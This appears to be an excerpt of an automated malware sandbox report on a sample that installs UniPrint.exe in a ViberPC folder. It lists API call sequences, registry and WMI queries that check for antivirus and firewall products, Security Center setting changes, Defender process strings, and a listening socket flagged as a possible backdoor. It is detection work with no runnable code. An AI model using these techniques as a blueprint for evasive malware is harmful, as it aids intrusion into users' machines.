Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 4_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 4_2_0054E987
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 4_2_0054EB57
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_0054EC16
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 4_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 4_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 2_2_0054B459
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,74E3A680,lstrcat,lstrlen, 0_2_00405B88
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_70988AF0

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.512252539.0000015E8B440000.00000004.00000001.sdmp Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510953306.0000015E8B413000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp, 4_2_00511D6F